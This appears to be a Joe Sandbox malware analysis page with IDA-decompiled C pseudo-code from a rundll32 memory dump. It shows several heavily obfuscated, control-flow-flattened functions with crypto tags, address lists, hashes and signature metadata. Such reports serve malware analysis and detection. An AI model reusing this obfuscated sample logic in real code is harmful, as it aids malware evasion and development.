									_t222 = E00349350( &_v564, _t252, _v608, _v580, _t234, _v612);
									asm("sbb esi, esi");
									_t250 = _v616;
									_t253 = ( ~_t222 & 0x010509a4) + 0x15a60c5;
									_t234 = _v656;
									E00351E67(_v656, _t250, _v620, _v588, _t252);
									_t260 = _t260 + 0x20;
									goto L14;
								} else {
									if(_t253 == 0xdba0984) {
										_t224 = E0035ABD1();
										_t258 = _v572 - _v548;
										asm("sbb ecx, [esp+0x84]");
										__eflags = _v568 - _t250;
										if(__eflags >= 0) {
											if(__eflags > 0) {
												L19:
												_t227 = 1;
												__eflags = 1;
											} else {
												__eflags = _t258 - _t224;
												if(_t258 >= _t224) {
													goto L19;
												}
											}
										}
									} else {
										_t268 = _t253 - 0xea70970;
										if(_t253 != 0xea70970) {
											goto L14;
										} else {
											_t250 = _v644;
											_t234 = _v628;
											_t226 = E0035DA22(_v628, _t250, _t268, _v636,  &_v524, _v628, _v652);
											_t260 = _t260 + 0x10;
											if(_t226 != 0) {
												_t253 = 0x9c0fe90;
												continue;
											}
										}
									}
								}
							}
						}
						L20:
						return _t227;
					}
					E0035C1EC(_v600, _v592,  &_v572);
					_pop(_t234);
					_t253 = 0xdba0984;
					L14:
					__eflags = _t253 - 0x15a60c5;
				} while (__eflags != 0);
				goto L20;
			}

0x0035411c
0x00354126
0x0035412e
0x00354136
0x0035413e
0x00354146
0x0035414e
0x00354156
0x0035415e
0x00354166
0x0035416e
0x00354176
0x0035417e
0x00354183
0x0035418b
0x00354193
0x003541a4
0x003541a8
0x003541aa
0x003541af
0x003541bb
0x003541be
0x003541c2
0x003541ca
0x003541da
0x003541de
0x003541e7
0x003541ec
0x003541f2
0x003541fa
0x00354202
0x00354207
0x0035420f
0x00354214
0x0035421c
0x00354224
0x00354230
0x00354233
0x00354237
0x0035423f
0x00354247
0x0035424f
0x00354254
0x0035425c
0x00354264
0x0035426c
0x00354274
0x00354279
0x00354281
0x00354289
0x0035428e
0x00354296
0x0035429b
0x003542a3
0x003542ab
0x003542b3
0x003542bb
0x003542c0
0x003542c8
0x003542d0
0x003542d8
0x003542dc
0x003542e4
0x003542f4
0x003542f9
0x003542ff
0x0035430c
0x00354314
0x0035431c
0x00354324
0x0035432c
0x00354334
0x00354339
0x00354341
0x00354349
0x00354355
0x0035435a
0x00354360
0x00354368
0x00354370
0x00354378
0x00354380
0x00354388
0x00354390
0x00354398
0x003543a0
0x003543a8
0x003543b0
0x003543b8
0x003543c0
0x003543cc
0x003543cf
0x003543d3
0x003543d7
0x003543df
0x003543df
0x003543f1
0x003544da
0x00000000
0x003543f7
0x003543f9
0x003544b8
0x003544c1
0x003544c6
0x003544c8
0x003544cb
0x003544ce
0x003544d0
0x00000000
0x003544d0
0x003543ff
0x00354405
0x0035445e
0x0035446a
0x0035447b
0x0035447f
0x00354485
0x00354489
0x0035448e
0x00000000
0x00354407
0x0035440d
0x0035450a
0x00354513
0x0035451e
0x00354525
0x00354527
0x00354529
0x0035452f
0x00354531
0x00354531
0x0035452b
0x0035452b
0x0035452d
0x00000000
0x00000000
0x0035452d
0x00354529
0x00354413
0x00354413
0x00354419
0x00000000
0x0035441f
0x00354430
0x00354434
0x00354438
0x0035443d
0x00354442
0x00354448
0x00000000
0x00354448
0x00354442
0x00354419
0x0035440d
0x00354405
0x003543f9
0x00354535
0x0035453e
0x0035453e
0x003544f1
0x003544f6
0x003544f7
0x003544fc
0x003544fc
0x003544fc
0x00000000

Strings

`2, xrefs: 00354237
?, xrefs: 00354254
,a, xrefs: 00354390

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ,a$`2$?
API String ID: 0-2087061617
Opcode ID: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
Instruction ID: e41fd1b55790657c0b45ecf96765ecc215a261b1f6b102cdc2c548797245c5ad
Opcode Fuzzy Hash: b784a720297949f87423ab3e41f7841c8e45ec588285f05096a8cbe103c55e24
Instruction Fuzzy Hash: 45A121725083419FC369CF65C88A80BFBF1BBC5718F018A1DF59A96260D3B58A498F86

Uniqueness

Uniqueness Score: -1.00%

Function 003459F2 Relevance: 4.0, Strings: 3, Instructions: 202
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E003459F2() {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				void* _t202;
				void* _t208;
				intOrPtr _t209;
				void* _t214;
				void* _t222;
				intOrPtr _t237;
				intOrPtr _t240;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int* _t247;

				_t247 =  &_v1140;
				_v1056 = 0x36f622;
				_v1052 = 0x8ed67e;
				_t214 = 0xf737bb2;
				_v1048 = 0x93fb3c;
				_t240 = 0;
				_v1044 = 0;
				_v1076 = 0x48eb17;
				_v1076 = _v1076 + 0x189d;
				_v1076 = _v1076 ^ 0x00442401;
				_v1100 = 0xa45863;
				_v1100 = _v1100 << 2;
				_t241 = 0x1d;
				_v1100 = _v1100 * 0x7c;
				_v1100 = _v1100 ^ 0x3e6538f4;
				_v1108 = 0x56f1ad;
				_v1108 = _v1108 | 0xbff0a597;
				_v1108 = _v1108 / _t241;
				_v1108 = _v1108 ^ 0x06946226;
				_v1132 = 0xc3fd0a;
				_v1132 = _v1132 << 8;
				_v1132 = _v1132 + 0xffff9bc2;
				_t242 = 0x18;
				_v1132 = _v1132 / _t242;
				_v1132 = _v1132 ^ 0x0821d39f;
				_v1068 = 0xc66dea;
				_v1068 = _v1068 + 0xffff0514;
				_v1068 = _v1068 ^ 0x00c0919e;
				_v1136 = 0x72811d;
				_v1136 = _v1136 ^ 0x5ea2c622;
				_t243 = 0x5d;
				_v1136 = _v1136 * 0x4f;
				_v1136 = _v1136 * 0x41;
				_v1136 = _v1136 ^ 0xd3c4c324;
				_v1096 = 0x2e25e6;
				_v1096 = _v1096 ^ 0xbdbebaf9;
				_v1096 = _v1096 ^ 0xbd932287;
				_v1060 = 0x3d42d8;
				_v1060 = _v1060 << 6;
				_v1060 = _v1060 ^ 0x0f5887f2;
				_v1116 = 0xec9c1f;
				_v1116 = _v1116 >> 1;
				_v1116 = _v1116 + 0xcef9;
				_v1116 = _v1116 ^ 0x0078140d;
				_v1084 = 0xf6a299;
				_v1084 = _v1084 >> 9;
				_v1084 = _v1084 ^ 0x00023821;
				_v1124 = 0xf6e97d;
				_v1124 = _v1124 + 0xffff8c4c;
				_v1124 = _v1124 / _t243;
				_v1124 = _v1124 | 0xda1c672f;
				_v1124 = _v1124 ^ 0xda1e012d;
				_v1120 = 0x9bdb66;
				_v1120 = _v1120 * 0x47;
				_v1120 = _v1120 + 0xdb13;
				_v1120 = _v1120 * 0x64;
				_v1120 = _v1120 ^ 0xe2e3c71f;
				_v1112 = 0x9fec0e;
				_v1112 = _v1112 << 0xc;
				_v1112 = _v1112 | 0xd7512eb2;
				_v1112 = _v1112 ^ 0xffdc645c;
				_v1104 = 0xc74eee;
				_v1104 = _v1104 + 0x930c;
				_v1104 = _v1104 ^ 0x28280d38;
				_v1104 = _v1104 ^ 0x28ef0d26;
				_v1064 = 0xc36095;
				_v1064 = _v1064 | 0x2d8f7273;
				_v1064 = _v1064 ^ 0x2dcb1501;
				_v1140 = 0xa3c477;
				_v1140 = _v1140 ^ 0xb16da3ec;
				_v1140 = _v1140 ^ 0x8917fdcb;
				_v1140 = _v1140 >> 0xe;
				_v1140 = _v1140 ^ 0x000e0fa0;
				_v1128 = 0x58136;
				_v1128 = _v1128 << 6;
				_v1128 = _v1128 << 0x10;
				_v1128 = _v1128 + 0xffffe729;
				_v1128 = _v1128 ^ 0x4d79f308;
				_v1072 = 0x735c84;
				_t244 = 0x7f;
				_v1072 = _v1072 / _t244;
				_v1072 = _v1072 ^ 0x0002b970;
				_v1080 = 0x91f75b;
				_v1080 = _v1080 + 0xffffc39e;
				_v1080 = _v1080 ^ 0x009f463e;
				_v1088 = 0xdf4dcf;
				_v1088 = _v1088 | 0x05792173;
				_v1088 = _v1088 ^ 0x05f69aec;
				_v1092 = 0xf44447;
				_v1092 = _v1092 * 0x78;
				_v1092 = _v1092 ^ 0x728504a1;
				do {
					while(_t214 != 0x89b0ee) {
						if(_t214 == 0x291094f) {
							E00343C3C(_v1072, _v1080,  &_v1040, _v1088, _v1092);
						} else {
							if(_t214 == 0x6a25a64) {
								E0035DA22(_v1076, _v1100, __eflags, _v1108,  &_v520, _t214, _v1132);
								_t247 =  &(_t247[4]);
								_t214 = 0xe0c4196;
								continue;
							} else {
								if(_t214 == 0xe0c4196) {
									_push(_v1096);
									_push(_v1136);
									_t208 = E0035DCF7(_v1068, 0x341000, __eflags);
									_pop(_t222);
									_t209 =  *0x363e10; // 0x0
									_t237 =  *0x363e10; // 0x0
									E003447CE(_t237 + 0x23c, _v1060, _t222, _v1116, _v1084, _t208, _t209 + 0x1c, _v1124, _v1120);
									E0034A8B0(_v1112, _t208, _v1104);
									_t247 =  &(_t247[9]);
									_t214 = 0x89b0ee;
									continue;
								} else {
									if(_t214 != 0xf737bb2) {
										goto L10;
									} else {
										_t214 = 0x6a25a64;
										continue;
									}
								}
							}
						}
						L13:
						return _t240;
					}
					_push(_v1128);
					_push( &_v1040);
					_push(_v1140);
					_t202 = E003613AD(_v1064,  &_v520, __eflags);
					_t247 =  &(_t247[3]);
					__eflags = _t202;
					_t240 =  !=  ? 1 : _t240;
					_t214 = 0x291094f;
					L10:
					__eflags = _t214 - 0xb653a05;
				} while (__eflags != 0);
				goto L13;
			}

0x003459f2
0x003459f8
0x00345a02
0x00345a0a
0x00345a0f
0x00345a1b
0x00345a1d
0x00345a21
0x00345a29
0x00345a31
0x00345a39
0x00345a41
0x00345a4d
0x00345a50
0x00345a54
0x00345a5c
0x00345a64
0x00345a74
0x00345a78
0x00345a80
0x00345a88
0x00345a8d
0x00345a99
0x00345a9e
0x00345aa4
0x00345aac
0x00345ab4
0x00345abc
0x00345ac4
0x00345acc
0x00345ad9
0x00345ada
0x00345ae3
0x00345ae7
0x00345aef
0x00345af7
0x00345aff
0x00345b07
0x00345b0f
0x00345b14
0x00345b1c
0x00345b24
0x00345b28
0x00345b30
0x00345b38
0x00345b40
0x00345b45
0x00345b4d
0x00345b55
0x00345b63
0x00345b67
0x00345b6f
0x00345b77
0x00345b84
0x00345b88
0x00345b95
0x00345b99
0x00345ba1
0x00345ba9
0x00345bae
0x00345bb6
0x00345bbe
0x00345bc8
0x00345bd5
0x00345be2
0x00345bea
0x00345bf2
0x00345bfa
0x00345c02
0x00345c0a
0x00345c12
0x00345c1a
0x00345c1f
0x00345c27
0x00345c2f
0x00345c34
0x00345c39
0x00345c41
0x00345c49
0x00345c57
0x00345c5a
0x00345c5e
0x00345c66
0x00345c6e
0x00345c76
0x00345c7e
0x00345c86
0x00345c8e
0x00345c96
0x00345ca3
0x00345ca7
0x00345caf
0x00345caf
0x00345cc1
0x00345dc8
0x00345cc7
0x00345cc9
0x00345d69
0x00345d6e
0x00345d71
0x00000000
0x00345ccf
0x00345cd1
0x00345ce3
0x00345cec
0x00345cf4
0x00345cfa
0x00345d05
0x00345d1c
0x00345d2f
0x00345d3e
0x00345d43
0x00345d46
0x00000000
0x00345cd3
0x00345cd9
0x00000000
0x00345cdf
0x00345cdf
0x00000000
0x00345cdf
0x00345cd9
0x00345cd1
0x00345cc9
0x00345dd0
0x00345ddc
0x00345ddc
0x00345d78
0x00345d80
0x00345d81
0x00345d90
0x00345d97
0x00345d9b
0x00345d9d
0x00345da0
0x00345da5
0x00345da5
0x00345da5
0x00000000

Strings

%., xrefs: 00345AEF
&(, xrefs: 00345A6C
&(, xrefs: 00345BE2

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &($&($%.
API String ID: 0-466442461
Opcode ID: 1759d8afc9e50e38acc85a98d1c4b10762865daf03545b9f43b58eba5708214e
Instruction ID: 18f6600160b674c69a821699a6b64d0ef86aa190a332fc634eba8dfb3033077d
Opcode Fuzzy Hash: 1759d8afc9e50e38acc85a98d1c4b10762865daf03545b9f43b58eba5708214e
Instruction Fuzzy Hash: 05A130B15083819FC798CF26C58941BFBF1FBC4758F008A1DF5A69A221D7B59A09CF86

Uniqueness

Uniqueness Score: -1.00%

Function 003613AD Relevance: 3.9, Strings: 3, Instructions: 169
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E003613AD(void* __ecx, void* __edx, void* __eflags) {
				void* _t197;
				signed int _t222;
				signed int _t226;
				void* _t236;
				void* _t245;
				void* _t246;

				_t245 = _t246 - 0x6c;
				_push( *((intOrPtr*)(_t245 + 0x7c)));
				_push( *((intOrPtr*)(_t245 + 0x78)));
				_push( *((intOrPtr*)(_t245 + 0x74)));
				_push(__edx);
				_push(__ecx);
				E003520B9(_t197);
				 *(_t245 + 0x10) =  *(_t245 + 0x10) & 0x00000000;
				 *(_t245 + 0x14) =  *(_t245 + 0x14) & 0x00000000;
				 *((intOrPtr*)(_t245 + 8)) = 0x9cee1d;
				 *((intOrPtr*)(_t245 + 0xc)) = 0x3f83c9;
				 *(_t245 + 0x38) = 0xf8747;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) | 0x414cebc6;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) << 1;
				 *(_t245 + 0x38) =  *(_t245 + 0x38) ^ 0x829fdf8f;
				 *(_t245 + 0x4c) = 0x1e90b9;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x5b;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x75;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) * 0x4c;
				 *(_t245 + 0x4c) =  *(_t245 + 0x4c) ^ 0x63bb7720;
				 *(_t245 + 0x54) = 0x94d35;
				 *(_t245 + 0x54) =  *(_t245 + 0x54) | 0xafff8ff7;
				 *(_t245 + 0x54) =  *(_t245 + 0x54) ^ 0xafffc7f7;
				 *(_t245 + 0x40) = 0x2ce8ae;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 0xe;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) << 2;
				 *(_t245 + 0x40) =  *(_t245 + 0x40) ^ 0xe8aa4789;
				 *(_t245 + 0x58) = 0x43e6f3;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff66dc;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) + 0xffff2d2d;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) << 3;
				 *(_t245 + 0x58) =  *(_t245 + 0x58) ^ 0x021485d0;
				 *(_t245 + 0x24) = 0x72d00d;
				 *(_t245 + 0x24) =  *(_t245 + 0x24) + 0xff2c;
				 *(_t245 + 0x24) =  *(_t245 + 0x24) ^ 0x0076519a;
				 *(_t245 + 0x34) = 0x43d743;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff7104;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) + 0xffff9485;
				 *(_t245 + 0x34) =  *(_t245 + 0x34) ^ 0x004ddf56;
				 *(_t245 + 0x2c) = 0xa6821;
				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) + 0xffff1b8c;
				 *(_t245 + 0x2c) =  *(_t245 + 0x2c) ^ 0x00054b1d;
				 *(_t245 + 0x60) = 0x210575;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) + 0xffff47c1;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) << 0xd;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) | 0x53e227ba;
				 *(_t245 + 0x60) =  *(_t245 + 0x60) ^ 0x5bea66b9;
				 *(_t245 + 0x44) = 0xde4c18;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x2ab2982c;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) | 0x439a512a;
				 *(_t245 + 0x44) =  *(_t245 + 0x44) ^ 0x6bf18420;
				 *(_t245 + 0x50) = 0xde2575;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) >> 0xa;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) << 0xe;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xce6820f5;
				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xc3874735;
				 *(_t245 + 0x18) = 0x52bd7f;
				 *(_t245 + 0x18) =  *(_t245 + 0x18) ^ 0x005e950b;
				 *(_t245 + 0x3c) = 0xe72c64;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) * 0x71;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) | 0xa2bf1516;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) ^ 0xe6bf08bc;
				 *(_t245 + 0x48) = 0x12926a;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) | 0xd69b5974;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) << 0xc;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) ^ 0xbdb2bc40;
				 *(_t245 + 0x5c) = 0xf2f3b3;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) << 3;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0xffff4add;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0x5b51;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) ^ 0x0796f200;
				 *(_t245 + 0x64) = 0x250dfe;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) << 7;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) | 0xde1ed6e5;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0xc3c6abe4;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0x1d594f44;
				 *(_t245 + 0x68) = 0x1b0053;
				_t226 = 0x44;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) * 0x1d;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) >> 0xa;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa237b60d;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa23e8db7;
				 *(_t245 + 0x30) = 0x848c63;
				_t142 = _t245 - 0x18; // 0x12da7d1b
				 *(_t245 + 0x30) =  *(_t245 + 0x30) / _t226;
				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x3584b77a;
				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x35842ad7;
				 *(_t245 + 0x28) = 0x69c662;
				 *(_t245 + 0x28) =  *(_t245 + 0x28) * 0x1f;
				 *(_t245 + 0x28) =  *(_t245 + 0x28) ^ 0x0ccd1c29;
				 *(_t245 + 0x20) = 0x70b48b;
				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xdd83dbf0;
				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xddf73f48;
				 *(_t245 + 0x1c) = 0x80403c;
				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) * 0x1c;
				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) ^ 0x0e0dbad6;
				_push( *(_t245 + 0x58));
				_push( *(_t245 + 0x40));
				_t236 = 0x1e;
				E00344B61(_t142, _t236);
				_t166 = _t245 - 0x220; // 0x12da7b13
				E00344B61(_t166, 0x208,  *(_t245 + 0x24),  *(_t245 + 0x34));
				_t169 = _t245 - 0x428; // 0x12da790b
				E00344B61(_t169, 0x208,  *(_t245 + 0x2c),  *(_t245 + 0x60));
				_t171 = _t245 - 0x220; // 0x12da7b13
				E00343BC0( *(_t245 + 0x44),  *(_t245 + 0x50), __edx,  *(_t245 + 0x18),  *(_t245 + 0x3c), _t171);
				_t176 = _t245 - 0x428; // 0x12da790b
				E00343BC0( *(_t245 + 0x48),  *(_t245 + 0x5c),  *((intOrPtr*)(_t245 + 0x78)),  *(_t245 + 0x64),  *(_t245 + 0x68), _t176);
				_t183 = _t245 - 0x18; // 0x12da7d1b
				 *(_t245 - 0x14) =  *(_t245 + 0x38);
				_t185 = _t245 - 0x220; // 0x12da7b13
				 *((intOrPtr*)(_t245 - 0x10)) = _t185;
				_t187 = _t245 - 0x428; // 0x12da790b
				 *((intOrPtr*)(_t245 - 0xc)) = _t187;
				 *((short*)(_t245 - 8)) =  *(_t245 + 0x54) |  *(_t245 + 0x4c) | 0x00000410;
				_t222 = E00344DDD( *(_t245 + 0x30), _t183,  *(_t245 + 0x28),  *(_t245 + 0x20),  *(_t245 + 0x1c));
				asm("sbb eax, eax");
				return  ~_t222 + 1;
			}

0x003613ae
0x003613b9
0x003613be
0x003613c1
0x003613c4
0x003613c5
0x003613c6
0x003613cb
0x003613cf
0x003613d3
0x003613da
0x003613e1
0x003613e8
0x003613ef
0x003613f2
0x003613f9
0x00361404
0x0036140b
0x00361412
0x00361415
0x0036141c
0x00361423
0x0036142a
0x00361431
0x00361438
0x0036143c
0x00361440
0x00361447
0x0036144e
0x00361455
0x0036145c
0x00361460
0x00361467
0x0036146e
0x00361475
0x0036147c
0x00361483
0x0036148a
0x00361491
0x00361498
0x0036149f
0x003614a6
0x003614ad
0x003614b4
0x003614bb
0x003614bf
0x003614c6
0x003614cd
0x003614d4
0x003614db
0x003614e2
0x003614e9
0x003614f0
0x003614f4
0x003614f8
0x003614ff
0x00361506
0x00361513
0x0036151a
0x00361525
0x00361528
0x0036152f
0x00361536
0x0036153d
0x00361544
0x00361548
0x0036154f
0x00361556
0x0036155a
0x00361561
0x00361568
0x0036156f
0x00361576
0x0036157a
0x00361581
0x0036158a
0x00361591
0x0036159e
0x0036159f
0x003615a2
0x003615a6
0x003615ad
0x003615b4
0x003615c0
0x003615c3
0x003615c6
0x003615cd
0x003615d4
0x003615df
0x003615e2
0x003615e9
0x003615f0
0x003615f7
0x003615fe
0x00361609
0x0036160c
0x00361613
0x00361616
0x0036161b
0x0036161c
0x00361629
0x00361632
0x0036163f
0x00361648
0x0036164d
0x00361661
0x00361666
0x0036167c
0x00361684
0x00361687
0x0036168d
0x00361693
0x00361696
0x0036169c
0x003616b0
0x003616ba
0x003616c4
0x003616cc

Strings

d,, xrefs: 0036151A
!h, xrefs: 00361498
5M, xrefs: 0036141C

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: !h$5M$d,
API String ID: 0-3324333736
Opcode ID: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
Instruction ID: 4f5adbbd11cb9bca20916532db70b6bb8406870c5faaed4274f8bdaee6cee324
Opcode Fuzzy Hash: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
Instruction Fuzzy Hash: D991BCB140038C9BCF59CF65C98A9DE3FB1FB04358F509219FD2A96260D3B59999CF84

Uniqueness

Uniqueness Score: -1.00%

Function 0035DEDC Relevance: 3.9, Strings: 3, Instructions: 162
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0035DEDC(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t132;
				signed int _t152;
				signed int _t154;
				signed int _t155;
				void* _t158;
				signed int* _t175;
				void* _t177;
				void* _t178;

				_push(_a16);
				_t174 = _a12;
				_t175 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t132);
				_v68 = 0x4bd93;
				_t178 = _t177 + 0x18;
				_v68 = _v68 << 0xc;
				_v68 = _v68 ^ 0x4bd93000;
				_t158 = 0xc7349d4;
				_v72 = 0xdd086a;
				_v72 = _v72 + 0xe602;
				_v72 = _v72 ^ 0x00de9932;
				_v80 = 0x3b4fac;
				_v80 = _v80 | 0x3fbbffff;
				_v80 = _v80 ^ 0x3fb1db7a;
				_v84 = 0xeaa49b;
				_v84 = _v84 | 0xeaf55708;
				_v84 = _v84 ^ 0x8a8b7318;
				_v84 = _v84 ^ 0x607b886d;
				_v88 = 0x47a;
				_v88 = _v88 << 0x10;
				_v88 = _v88 << 7;
				_v88 = _v88 ^ 0x3d0d9eb4;
				_v92 = 0xf1af5e;
				_v92 = _v92 >> 0xc;
				_t154 = 0x35;
				_v92 = _v92 * 0x55;
				_v92 = _v92 ^ 0x000492d7;
				_v104 = 0x9f0b47;
				_v104 = _v104 + 0xffffc934;
				_v104 = _v104 ^ 0x723421f7;
				_v104 = _v104 | 0x7192d654;
				_v104 = _v104 ^ 0x73b08a7e;
				_v100 = 0x1207d9;
				_v100 = _v100 + 0x7e1b;
				_v100 = _v100 | 0x7b677906;
				_v100 = _v100 * 0xf;
				_v100 = _v100 ^ 0x3c0b4b50;
				_v60 = 0x5b441e;
				_v60 = _v60 ^ 0x5c22d9cd;
				_v60 = _v60 ^ 0x5c7ef938;
				_v64 = 0xefe367;
				_v64 = _v64 + 0x4581;
				_v64 = _v64 ^ 0x00f6697a;
				_v76 = 0x71c375;
				_t155 = 0x14;
				_v76 = _v76 / _t154;
				_v76 = _v76 + 0xaf56;
				_v76 = _v76 ^ 0x000ba048;
				_v48 = 0x1a9f92;
				_v48 = _v48 + 0x9d50;
				_v48 = _v48 ^ 0x001d37d0;
				_v52 = 0xf5c688;
				_v52 = _v52 + 0xffff5f34;
				_v52 = _v52 ^ 0x00ffa10c;
				_v56 = 0x3cec64;
				_v56 = _v56 ^ 0x003949c0;
				_v96 = 0x7057ec;
				_v96 = _v96 * 0x35;
				_v96 = _v96 | 0xca3e56e5;
				_v96 = _v96 / _t155;
				_v96 = _v96 ^ 0x0b2d80e0;
				do {
					while(_t158 != 0x254c3a7) {
						if(_t158 == 0x324cad4) {
							E00350DAF(_v100,  &_v44, _v60,  *_t174, _v64, _v76);
							_t178 = _t178 + 0x10;
							_t158 = 0xd972b83;
							continue;
						} else {
							if(_t158 == 0xc7349d4) {
								_t158 = 0x254c3a7;
								 *_t175 =  *_t175 & 0x00000000;
								_t175[1] = _v68;
								continue;
							} else {
								if(_t158 == 0xd972b83) {
									E00360E3A( &_v44, _v48, __eflags, _v52, _v56, _v96, _t174 + 4);
								} else {
									if(_t158 == 0xecd5bc1) {
										_push(_t158);
										_push(_t158);
										_t152 = E00347FF2(_t175[1]);
										 *_t175 = _t152;
										__eflags = _t152;
										if(__eflags != 0) {
											_t158 = 0xfbc7198;
											continue;
										}
									} else {
										if(_t158 != 0xfbc7198) {
											goto L13;
										} else {
											E00343DBC( &_v44, _t175, _v88, _v92, _v104);
											_t178 = _t178 + 0xc;
											_t158 = 0x324cad4;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t175;
						_t131 =  *_t175 != 0;
						__eflags = _t131;
						return 0 | _t131;
					}
					_t175[1] = E0035AC3A(_t174);
					_t158 = 0xecd5bc1;
					L13:
					__eflags = _t158 - 0x72dd7bf;
				} while (__eflags != 0);
				goto L16;
			}

0x0035dee3
0x0035deea
0x0035def1
0x0035def3
0x0035def4
0x0035defb
0x0035df02
0x0035df03
0x0035df04
0x0035df09
0x0035df11
0x0035df14
0x0035df1b
0x0035df23
0x0035df28
0x0035df30
0x0035df38
0x0035df40
0x0035df48
0x0035df50
0x0035df58
0x0035df60
0x0035df68
0x0035df70
0x0035df78
0x0035df80
0x0035df85
0x0035df8a
0x0035df92
0x0035df9a
0x0035dfa6
0x0035dfa9
0x0035dfad
0x0035dfb5
0x0035dfbd
0x0035dfc5
0x0035dfcd
0x0035dfd5
0x0035dfdd
0x0035dfe5
0x0035dfed
0x0035dffa
0x0035dffe
0x0035e006
0x0035e00e
0x0035e016
0x0035e01e
0x0035e026
0x0035e02e
0x0035e036
0x0035e044
0x0035e045
0x0035e049
0x0035e051
0x0035e059
0x0035e061
0x0035e069
0x0035e071
0x0035e079
0x0035e081
0x0035e089
0x0035e099
0x0035e0a1
0x0035e0ae
0x0035e0b2
0x0035e0cc
0x0035e0d0
0x0035e0d8
0x0035e0d8
0x0035e0e6
0x0035e176
0x0035e17b
0x0035e17e
0x00000000
